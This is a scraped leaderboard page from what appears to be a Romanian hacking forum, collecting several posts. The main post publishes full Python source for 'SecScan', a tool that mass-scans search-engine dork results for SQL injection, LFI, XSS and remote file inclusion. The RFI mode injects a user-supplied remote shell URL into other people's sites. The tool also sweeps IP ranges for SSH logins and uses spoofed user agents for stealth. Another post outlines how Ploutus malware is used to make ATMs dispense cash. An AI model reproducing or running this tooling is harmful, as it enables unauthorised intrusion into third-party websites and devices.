Leaderboard
Popular Content
Showing content with the highest reputation on 03/25/14 in all areas
-
Vreau doar s? v? spun c? atunci când un om public? sau face ceva util s? da?i +REP ?i nu doar Like. Da, de multe ori chestia aia chiar conteaz? pentru propriul ego (mai ales dac? v? chinui?i la ceva anume). Iar în ultima vreme au ap?rut tutoriale ?i informa?ii chiar foarte bune. De la unele trebuie s?pat pe lâng? ele, dar oricum. Like e ok când sunte?i de acord cu o idee deja expus? sau v? place acea idee, dar nu v-a oferit mare lucru. Doar zic. Closed!2 points
-
SecScan is the Multithreading Web Vulnerability Scanner plus professional Utilities for penetrating testers.A compact Web Apps Vulnerable Scanner for amateur pentester. Feature - SQLi, XSS, LFI, RFI Utilities - Admin/login finder, sub-domain finder, online/offline MD5 cracker, Router checker, local IP lookup Stable version will covers - auto SQL injector (bind with SlowQL) Fuzzer, Port/OS Scanner, MD5/SHA1 bruteforcer, MD5/SHA1 crypter, Known bugs - Still crash during MD5 dictionary attack on large lengths of text. XSS sometime gives false positive. How to run - To run: ./SecScan bug issues report at: norske.drittsekk@gmail.com || digiopen55@gmail.com Fix issues & upgrades: - Crash during LFI & XSS scans - More MD5 Dictionary cracking features & functions. - Run more stable in SQL scan mode. - Able to search more than 20 pages. (max is 90 to avoid cut off/CAPTCHA-request by search engine) - more search engine choice. Default is still Ask Engine. (Bing & Yahoo are fine, not recommend Google API) - More stealthy - Random user-agent generator Will add more in near-future: - SQL injector (bind with my other project slowQL) - MD5 bruteforcer (offline) - SHA1 Dic/Brute cracker - Hex viewer. - Proxy finder - Proxified mode - Heuristic port & OS scanner (similar to N-map) #!/usr/bin/env python import re import hashlib import Queue from random import choice import threading import time import urllib2 import sys import socket try: import paramiko #Router option requires the paramiko module for shh connections. PARAMIKO_IMPORTED = True except ImportError: PARAMIKO_IMPORTED = False USER_AGENT = ["Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3", "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7", "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)", "YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)", "Mozilla/5.0 (Windows; U; Windows NT 5.1) AppleWebKit/535.38.6 (KHTML, like Gecko) Version/5.1 Safari/535.38.6", "Mozilla/5.0 (Macintosh; U; U; PPC Mac OS X 10_6_7 rv:6.0; en-US) AppleWebKit/532.23.3 (KHTML, like Gecko) Version/4.0.2 Safari/532.23.3" ] option = ' ' vuln = 0 invuln = 0 np = 0 found = [] class Router(threading.Thread): """Checks for routers running ssh with given User/Pass""" def __init__(self, queue, user, passw): if not PARAMIKO_IMPORTED: print 'You need paramiko.' print 'http://www.lag.net/paramiko/' sys.exit(1) threading.Thread.__init__(self) self.queue = queue self.user = user self.passw = passw def run(self): """Tries to connect to given Ip on port 22""" ssh = paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) while True: try: ip_add = self.queue.get(False) except Queue.Empty: break try: ssh.connect(ip_add, username = self.user, password = self.passw, timeout = 10) ssh.close() print "Working: %s:22 - %s:%s\n" % (ip_add, self.user, self.passw) write = open('Routers.txt', "a+") write.write('%s:22 %s:%s\n' % (ip_add, self.user, self.passw)) write.close() self.queue.task_done() except: print 'Not Working: %s:22 - %s:%s\n' % (ip_add, self.user, self.passw) self.queue.task_done() class Ip: """Handles the Ip range creation""" def __init__(self): self.ip_range = [] self.start_ip = raw_input('Start ip: ') self.end_ip = raw_input('End ip: ') self.user = raw_input('User: ') self.passw = raw_input('Password: ') self.iprange() def iprange(self): """Creates list of Ip's from Start_Ip to End_Ip""" queue = Queue.Queue() start = list(map(int, self.start_ip.split("."))) end = list(map(int, self.end_ip.split("."))) tmp = start self.ip_range.append(self.start_ip) while tmp != end: start[3] += 1 for i in (3, 2, 1): if tmp[i] == 256: tmp[i] = 0 tmp[i-1] += 1 self.ip_range.append(".".join(map(str, tmp))) for add in self.ip_range: queue.put(add) for i in range(10): thread = Router(queue, self.user, self.passw ) thread.setDaemon(True) thread.start() queue.join() class Crawl: """Searches for dorks and grabs results""" def __init__(self): if option == '4': self.shell = str(raw_input('Shell location: ')) self.dork = raw_input('Enter your dork: ') self.queue = Queue.Queue() self.pages = raw_input('How many pages(Max 20): ') self.qdork = urllib2.quote(self.dork) self.page = 1 self.crawler() def crawler(self): """Crawls Ask.com for sites and sends them to appropriate scan""" print '\nScanning Ask...' for i in range(int(self.pages)): host = "http://uk.ask.com/web?q=%s&page=%s" % (str(self.qdork), self.page) req = urllib2.Request(host) req.add_header('User-Agent', choice(USER_AGENT)) response = urllib2.urlopen(req) source = response.read() start = 0 count = 1 end = len(source) numlinks = source.count('_t" href', start, end) while count < numlinks: start = source.find('_t" href', start, end) end = source.find(' onmousedown="return pk', start, end) link = source[start+10:end-1].replace("amp;","") self.queue.put(link) start = end end = len(source) count = count + 1 self.page += 1 if option == '1': for i in range(10): thread = ScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '2': for i in range(10): thread = LScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '3': for i in range(10): thread = XScanClass(self.queue) thread.setDaemon(True) thread.start() self.queue.join() elif option == '4': for i in range(10): thread = RScanClass(self.queue, self.shell) thread.setDaemon(True) thread.start() self.queue.join() class ScanClass(threading.Thread): """Scans for Sql errors and ouputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.schar = "'" self.file = 'sqli.txt' def run(self): """Scans Url for Sql errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np test = site + self.schar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("You have an error in your SQL syntax", data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('mysql_fetch', data, re.I)): self.mysql(test) vuln += 1 elif (re.findall('JET Database Engine', data, re.I)): self.mssql(test) vuln += 1 elif (re.findall('Microsoft OLE DB Provider for', data, re.I)): self.mssql(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def mysql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "MySql: " + url write = open(self.file, "a+") write.write('[SQLI]: ' + url + "\n") write.close() def mssql(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file).read() if url in read: print 'Dupe: ' + url else: print "MsSql: " + url write = open ('[SQLI]: ' + self.file, "a+") write.write(url + "\n") write.close() class LScanClass(threading.Thread): """Scans for Lfi errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.file = 'lfi.txt' self.queue = queue self.lchar = '../' def run(self): """Checks Url for File Inclusion errors""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: lsite = site.rsplit('=', 1)[0] if lsite[-1] != "=": lsite = lsite + "=" test = lsite + self.lchar global vuln global invuln global np try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("failed to open stream: No such file or directory", data, re.I)): self.lfi(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def lfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Lfi: " + url write = open(self.file, "a+") write.write('[LFI]: ' + url + "\n") write.close() class XScanClass(threading.Thread): """Scan for Xss errors and outputs to file""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue self.xchar = """"><script>alert('xss')</script>""" self.file = 'xss.txt' def run(self): """Checks Url for possible Xss""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np xsite = site.rsplit('=', 1)[0] if xsite[-1] != "=": xsite = xsite + "=" test = xsite + self.xchar try: conn = urllib2.Request(test) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall("<script>alert('xss')</script>", data, re.I)): self.xss(test) vuln += 1 else: print test + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def xss(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Xss: " + url write = open(self.file, "a+") write.write('[XSS]: ' + url + "\n") write.close() class RScanClass(threading.Thread): """Scans for Rfi errors and outputs to file""" def __init__(self, queue, shell): threading.Thread.__init__(self) self.queue = queue self.file = 'rfi.txt' self.shell = shell def run(self): """Checks Url for Remote File Inclusion vulnerability""" while True: try: site = self.queue.get(False) except Queue.Empty: break if '=' in site: global vuln global invuln global np rsite = site.rsplit('=', 1)[0] if rsite[-1] != "=": rsite = rsite + "=" link = rsite + self.shell + '?' try: conn = urllib2.Request(link) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() data = opener.open(conn).read() except: self.queue.task_done() else: if (re.findall('uname -a', data, re.I)): #Or change to whatever is going to be in your shell for sure. self.rfi(link) vuln += 1 else: print link + ' <-- Not Vuln' invuln += 1 else: print site + ' <-- No Parameters' np += 1 self.queue.task_done() def rfi(self, url): """Proccesses vuln sites into text file and outputs to screen""" read = open(self.file, "a+").read() if url in read: print 'Dupe: ' + url else: print "Rfi: " + url write = open(self.file, "a+") write.write('[Rfi]: ' + url + "\n") write.close() class Atest(threading.Thread): """Checks given site for Admin Pages/Dirs""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Admin Page/Dir exists""" while True: try: site = self.queue.get(False) except Queue.Empty: break try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) print site found.append(site) self.queue.task_done() except urllib2.URLError: self.queue.task_done() def admin(): """Create queue and threads for admin page scans""" print 'Need to include http:// and ending /\n' site = raw_input('Site: ') queue = Queue.Queue() dirs = ['admin.php', 'admin/', 'en/admin/', 'administrator/', 'moderator/', 'webadmin/', 'adminarea/', 'bb-admin/', 'adminLogin/', 'admin_area/', 'panel-administracion/', 'instadmin/', 'memberadmin/', 'administratorlogin/', 'adm/', 'admin/account.php', 'admin/index.php', 'admin/login.php', 'admin/admin.php', 'admin/account.php', 'joomla/administrator', 'login.php', 'admin_area/admin.php' ,'admin_area/login.php' ,'siteadmin/login.php' ,'siteadmin/index.php', 'siteadmin/login.html', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/admin.html', 'admin_area/index.php', 'bb-admin/index.php', 'bb-admin/login.php', 'bb-admin/admin.php', 'admin/home.php', 'admin_area/login.html', 'admin_area/index.html', 'admin/controlpanel.php', 'admincp/index.asp', 'admincp/login.asp', 'admincp/index.html', 'admin/account.html', 'adminpanel.html', 'webadmin.html', 'webadmin/index.html', 'webadmin/admin.html', 'webadmin/login.html', 'admin/admin_login.html', 'admin_login.html', 'panel-administracion/login.html', 'admin/cp.php', 'cp.php', 'administrator/index.php', 'cms', 'administrator/login.php', 'nsw/admin/login.php', 'webadmin/login.php', 'admin/admin_login.php', 'admin_login.php', 'administrator/account.php' ,'administrator.php', 'admin_area/admin.html', 'pages/admin/admin-login.php' ,'admin/admin-login.php', 'admin-login.php', 'bb-admin/index.html', 'bb-admin/login.html', 'bb-admin/admin.html', 'admin/home.html', 'modelsearch/login.php', 'moderator.php', 'moderator/login.php', 'moderator/admin.php', 'account.php', 'pages/admin/admin-login.html', 'admin/admin-login.html', 'admin-login.html', 'controlpanel.php', 'admincontrol.php', 'admin/adminLogin.html' ,'adminLogin.html', 'admin/adminLogin.html', 'home.html', 'rcjakar/admin/login.php', 'adminarea/index.html', 'adminarea/admin.html', 'webadmin.php', 'webadmin/index.php', 'webadmin/admin.php', 'admin/controlpanel.html', 'admin.html', 'admin/cp.html', 'cp.html', 'adminpanel.php', 'moderator.html', 'administrator/index.html', 'administrator/login.html', 'user.html', 'administrator/account.html', 'administrator.html', 'login.html', 'modelsearch/login.html', 'moderator/login.html', 'adminarea/login.html', 'panel-administracion/index.html', 'panel-administracion/admin.html', 'modelsearch/index.html', 'modelsearch/admin.html', 'admincontrol/login.html', 'adm/index.html', 'adm.html', 'moderator/admin.html', 'user.php', 'account.html', 'controlpanel.html', 'admincontrol.html', 'panel-administracion/login.php', 'wp-login.php', 'wp-admin', 'typo3', 'adminLogin.php', 'admin/adminLogin.php', 'home.php','adminarea/index.php' ,'adminarea/admin.php' ,'adminarea/login.php', 'panel-administracion/index.php', 'panel-administracion/admin.php', 'modelsearch/index.php', 'modelsearch/admin.php', 'admincontrol/login.php', 'adm/admloginuser.php', 'admloginuser.php', 'admin2.php', 'admin2/login.php', 'admin2/index.php', 'adm/index.php', 'adm.php', 'affiliate.php'] for add in dirs: test = site + add queue.put(test) for i in range(20): thread = Atest(queue) thread.setDaemon(True) thread.start() queue.join() def aprint(): """Print results of admin page scans""" print 'Search Finished\n' if len(found) == 0: print 'No pages found' else: for site in found: print 'Found: ' + site class SDtest(threading.Thread): """Checks given Domain for Sub Domains""" def __init__(self, queue): threading.Thread.__init__(self) self.queue = queue def run(self): """Checks if Sub Domain responds""" while True: try: domain = self.queue.get(False) except Queue.Empty: break try: site = 'http://' + domain conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) except urllib2.URLError: self.queue.task_done() else: target = socket.gethostbyname(domain) print 'Found: ' + site + ' - ' + target self.queue.task_done() def subd(): """Create queue and threads for sub domain scans""" queue = Queue.Queue() site = raw_input('Domain: ') sub = ["admin", "access", "accounting", "accounts", "admin", "administrator", "aix", "ap", "archivos", "aula", "aulas", "ayuda", "backup", "backups", "bart", "bd", "beta", "biblioteca", "billing", "blackboard", "blog", "blogs", "bsd", "cart", "catalog", "catalogo", "catalogue", "chat", "chimera", "citrix", "classroom", "clientes", "clients", "carro", "connect", "controller", "correoweb", "cpanel", "csg", "customers", "db", "dbs", "demo", "demon", "demostration", "descargas", "developers", "development", "diana", "directory", "dmz", "domain", "domaincontroller", "download", "downloads", "ds", "eaccess", "ejemplo", "ejemplos", "email", "enrutador", "example", "examples", "exchange", "eventos", "events", "extranet", "files", "finance", "firewall", "foro", "foros", "forum", "forums", "ftp", "ftpd", "fw", "galeria", "gallery", "gateway", "gilford", "groups", "groupwise", "guia", "guide", "gw", "help", "helpdesk", "hera", "heracles", "hercules", "home", "homer", "hotspot", "hypernova", "images", "imap", "imap3", "imap3d", "imapd", "imaps", "imgs", "imogen", "inmuebles", "internal", "intranet", "ipsec", "irc", "ircd", "jabber", "laboratorio", "lab", "laboratories", "labs", "library", "linux", "lisa", "login", "logs", "mail", "mailgate", "manager", "marketing", "members", "mercury", "meta", "meta01", "meta02", "meta03", "miembros", "minerva", "mob", "mobile", "moodle", "movil", "mssql", "mx", "mx0", "mx1", "mx2", "mx3", "mysql", "nelson", "neon", "netmail", "news", "novell", "ns", "ns0", "ns1", "ns2", "ns3", "online", "oracle", "owa", "partners", "pcanywhere", "pegasus", "pendrell", "personal", "photo", "photos", "pop", "pop3", "portal", "postman", "postmaster", "private", "proxy", "prueba", "pruebas", "public", "ras", "remote", "reports", "research", "restricted", "robinhood", "router", "rtr", "sales", "sample", "samples", "sandbox", "search", "secure", "seguro", "server", "services", "servicios", "servidor", "shop", "shopping", "smtp", "socios", "soporte", "squirrel", "squirrelmail", "ssh", "staff", "sms", "solaris", "sql", "stats", "sun", "support", "test", "tftp", "tienda", "unix", "upload", "uploads", "ventas", "virtual", "vista", "vnc", "vpn", "vpn1", "vpn2", "vpn3", "wap", "web1", "web2", "web3", "webct", "webadmin", "webmail", "webmaster", "win", "windows", "www", "ww0", "ww1", "ww2", "ww3", "www0", "www1", "www2", "www3", "xanthus", "zeus"] for check in sub: test = check + '.' + site queue.put(test) for i in range(20): thread = SDtest(queue) thread.setDaemon(True) thread.start() queue.join() class Cracker(threading.Thread): """Use a wordlist to try and brute the hash""" def __init__(self, queue, hashm): threading.Thread.__init__(self) self.queue = queue self.hashm = hashm def run(self): """Hash word and check against hash""" while True: try: word = self.queue.get(False) except Queue.Empty: break tmp = hashlib.md5(word).hexdigest() if tmp == self.hashm: self.result(word) self.queue.task_done() def result(self, words): """Print result if found""" print self.hashm + ' = ' + words def word(): """Create queue and threads for hash crack""" queue = Queue.Queue() wordlist = raw_input('Wordlist: ') hashm = raw_input('Enter Md5 hash: ') read = open(wordlist) for words in read: words = words.replace("\n","") queue.put(words) read.close() for i in range(5): thread = Cracker(queue, hashm) thread.setDaemon(True) thread.start() queue.join() class OnlineCrack: """Use online service to check for hash""" def crack(self): """Connect and check hash""" hashm = raw_input('Enter MD5 Hash: ') conn = urllib2.Request('http://md5.hashcracking.com/search.php?md5=%s' % (hashm)) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() if data == 'No results returned.': print '\n- Not found or not valid -' else: print '\n- %s -' % (data) class Check: """Check your current IP address""" def grab(self): """Connect to site and grab IP""" site = 'http://www.tracemyip.org/' try: conn = urllib2.Request(site) conn.add_header('User-Agent', choice(USER_AGENT)) opener = urllib2.build_opener() opener.open(conn) data = opener.open(conn).read() start = 0 end = len(data) start = data.find('onClick="', start, end) end = data.find('size=', start, end) ip_add = data[start+46:end-2].strip() print '\nYour current Ip address is %s' % (ip_add) except urllib2.HTTPError: print 'Error connecting' def output(): """Outputs dork scan results to screen""" print '\n>> ' + str(vuln) + ' Vulnerable Sites Found' print '>> ' + str(invuln) + ' Sites Not Vulnerable' print '>> ' + str(np) + ' Sites Without Parameters' if option == '1': print '>> Output Saved To sqli.txt\n' elif option == '2': print '>> Output Saved To lfi.txt' elif option == '3': print '>> Output Saved To xss.txt' elif option == '4': print '>> Output Saved To rfi.txt' def main(): """Outputs Menu and gets input""" red = "\033[01;31m{0}\033[00m" quotes = [ '\n{Happy Hacking, friends & foes} -- NorskeDrittsekk\n' '\n{What is the different between an exploiter & cryptographer? An exploiter has a lot creativity} -- f0ny\n' ] print red.format(''' ++++++++++++++++++++++++++++++++++ + = Advance Web Apps Scanner = + + + + by + + + + Black Tiger Security + + + + now available + + + + in public + ++++++++++++++++++++++++++++++++++ Please choose one of these options below (enter numbers only): === Scanners: [[READ: you don't have to enter inurl, just stuff like index.php?id= or .aspx?id=]] [1] SQLi [2] LFI [3] XSS [4] RFI === Other Tools: [5] Route Checker [6] Admin Page Finder [7] Sub Domain Scan [8] Dic MD5 cracker [9] Online/Rainbow MD5 cracker [10] Check local IP address ''') global option option = raw_input('Enter Option: ') if option: if option == '1': Crawl() output() print red.format(choice(quotes)) elif option == '2': Crawl() output() print red.format(choice(quotes)) elif option == '3': Crawl() output() print red.format(choice(quotes)) elif option == '4': Crawl() output() print red.format(choice(quotes)) elif option == '5': Ip() print red.format(choice(quotes)) elif option == '6': admin() aprint() print red.format(choice(quotes)) elif option == '7': subd() print red.format(choice(quotes)) elif option == '8': word() print red.format(choice(quotes)) elif option == '9': OnlineCrack().crack() print red.format(choice(quotes)) elif option == '10': Check().grab() print red.format(choice(quotes)) else: print '\nInvalid Choice\n' time.sleep(0.9) main() else: print '\nYou Must Enter An Option (Check if your typo is corrected.)\n' time.sleep(0.9) main() if __name__ == '__main__': main() download: http://secscan-py.googlecode.com/files/SecScan-v1.1b source1 point
-
De cand iti permiti sa spui ca proiectul a fost realizat de Reckon si de "Corex" adica de tine? Reckon nu ti-a dat voie sa faci asa ceva, el nu a lucrat cu tine la asa ceva, ar trebuii sa fi prea nesimtit sa scrii asta. XPACH SQL Injection E XPATH nu XPACH, vai de coaiele tale.1 point
-
As we reported earlier, Microsoft will stop supporting the Windows XP operating system after 8th April, apparently 95% of the world’s 3 million ATM machines are run on it. Microsoft's decision to withdraw support for Windows XP poses critical security threat to the economic infrastructure worldwide. MORE REASONS TO UPGRADE Security researchers at Antivirus firm Symantec claimed that hackers can exploit a weakness in Windows XP based ATMs, that allow them to withdraw cash simply by sending an SMS to compromised ATMs. "What was interesting about this variant of Ploutus was that it allowed cybercriminals to simply send an SMS to the compromised ATM, then walk up and collect the dispensed cash. It may seem incredible, but this technique is being used in a number of places across the world at this time." researchers said. HARDWIRED Malware for ATMs According to researchers - In 2013, they detected a malware named Backdoor.Ploutus, installed on ATMs in Mexico, which is designed to rob a certain type of standalone ATM with just the text messages. To install the malware into ATMs machines, hacker must connect the ATM to a mobile phone via USB tethering and then to initiate a shared Internet connection, which then can be used to send specific SMS commands to the phone attached or hardwired inside the ATM. https://www.youtube.com/watch?v=53vjNDV4RAY "Since the phone is connected to the ATM through the USB port, the phone also draws power from the connection, which charges the phone battery. As a result, the phone will remain powered up indefinitely." HOW-TO HACK ATMs Connect a mobile phone to the machine with a USB cable and install Ploutus Malware. The attacker sends two SMS messages to the mobile phone inside the ATM. -SMS 1 contains a valid activation ID to activate the malware -SMS 2 contains a valid dispense command to get the money out Mobile attached inside the ATM detects valid incoming SMS messages and forwards them to the ATM as a TCP or UDP packet. Network packet monitor (NPM) module coded in the malware receives the TCP/UDP packet and if it contains a valid command, it will execute Ploutus Amount for Cash withdrawal is pre-configured inside the malware Finally, the hacker can collect cash from the hacked ATM machine. Researchers have detected few more advanced variants of this malware, some attempts to steal customer card and PIN data, while others attempt man-in-the-middle attacks. This malware is now spreading to other countries, so you are recommended to pay extra attention and remain cautious while using an ATM. Sauce1 point
-
De vreo doua luni am inceput sa particip cu ei la CTF-uri. Eu acopar partea de web1 point
-
1 point
-
Am reusit sa fac ceva, sper doar sa poti adapta pentru ce ai tu nevoie(vezi ca incarcarea pagini cu wx.html2.WebView dureaza cateva secunde, si de asemenea implementarea webView depinde de sistemul de operare. Pe windows e implementat sa foloseasca dll-urile IE Pe linux foloseste webKitGTK+ Pe macos foloseste OSxWebKit iti postez un mic exemplu de test(probabil are vreo 2 erori + ca ai un main loop and stuff. Pentru a putea implementa instantia webview ai nevoie de un frame parinte care sa il tina, insa nu e obligatoriu sa il si arati(cum fac eu). Output-ul de la self.brsr.GetPageText este sub forma de string, si poti face pe el, orice operatie. import wx import wx.html2 import wx class Example(wx.Frame): def __init__(self, *args, **kw): super(Example, self).__init__(*args, **kw) self.InitUI() def InitUI(self): self.brsr = wx.html2.WebView.New(self) self.brsr.LoadURL('http://www.auction.com/search?search=deltona+fl&auction_type=residential') self.Bind(wx.html2.EVT_WEBVIEW_LOADED, self.OnLoaded) def OnMove(self, e): x, y = e.GetPosition() self.st1.SetLabel(str(x)) self.st2.SetLabel(str(y)) def OnLoaded(self, e): if(not self.brsr or self.brsr.IsBusy()): return print self.brsr.GetPageText() def main(): ex = wx.App() Example(None) ex.MainLoop() if __name__ == '__main__': main()1 point
-
[RST] Post Hunter este o aplicatie care iti permite sa "tragi cu ochil" la ce se intampla pe RST atunci cand lucrezi la un proiect/programezi si nu ai timp/nu vrei sa iti intrerupi munca. Aplicatia verifica in fiecare minut ultimile postari de pe RST iar atunci cand apare un post/comentariu nou creaza un Baloon Tip : Acel Baloon Tip va sta acolo 4 secunde. Daca dai click pe Baloon Tip acesta te va duce catre postul/comentariul respectiv in functie de setarile care le faci in aplicatie : Click pe rotita pentru a face setarile! //UPDATE Setarile sunt salvate in registry. Evitati sa selectati prea multe categorii. Download : https://www.dropbox.com/s/xs8vwmj8w62mk2v/%5BRST%5D%20Post%20Hunter.rar Va rog sa raportati eventualele erori de programare. Sper sa va fie de folos. // Aplicatia este facuta in .NET folosind Framework 2.0 3/21/2014 Sursa Post Hunter (pass "hunter"): https://www.dropbox.com/s/bnhd641yovspf3h/RST%20Post%20Hunter%202.rar1 point
-
@Maximus Eu oricum nu o sa postez nimic, mi-a ajuns cu el si la ce limbaj are. In afara de cateva fraze ironice, dar la obiect, eu nu i-am mai zis nimic. El s-a agitat ca un pepsi, probabil i-am ranit orgoliul de hacker:)) si a inceput sa vorbeasca si urat. E aiurea ce face si ce prostii poate sa spuna. Dar daca tot zice ca din discutie reiese ca sunt un copil, de ce nu o pune? Eu am argumentat orice am zis.-1 points
-
Cuvant inainte Initiatorul proiectului este Reckon cu site-ul lui pentest-academy.com Dupa ce s-a inchis site-ul lui a facut publice scripturile si am spus sa il redeschid eu din nou Nu a publicat partea de XSS deci a trebuit sa o refac eu de la 0 desi inca nu este in totalitate gata m-am gandit Ca este folositor si cat am lucrat si sa o updatez pe parcurs ce termin cate un nivel nou. Ce etape trebuie sa treci la SQL injection La SQL injection aveti 4 nivele de cursuri cu 4 examene Dupa fiecare lectie terminata aveti cate un examen , la terminarea examenului veti fi trecuti in HOF la categoria unde ati absolvit examenul Ce etape trebuie sa treci la Cross Site Scripting La Cross Site Scripting tot aveti 4 etape deocam data nu avem examene Dar le voi adauga pe parcurs , aici veti invata metode de a trece de Filtre Cum ar arata codul in spate si cum se recunoaste un XSS CURSURI SQL INJECTION SQL INJECTION NIVEL 1 UNION BASED SQL INJECTION NIVEL 2 ERROR BASED SQL INJECTION NIVEL 3 DOUBLE QUERY SQL INJECTION NIVEL 4 XPATH INJECTION CURSURI XSS (CROSS SITE SCRIPTING) XSS (CROSS SITE SCRIPTING) LEVEL 1 XSS (CROSS SITE SCRIPTING) LEVEL 2 XSS (CROSS SITE SCRIPTING) LEVEL 3 XSS (CROSS SITE SCRIPTING) LEVEL 4 ©©©©©©©©©©©©©©©©©©©©©©©©©© ©©©Proiect realizat de Reckon & Corex©©©©©© ©©©©©©©©©©©©©©©©©©©©©©©©©©-1 points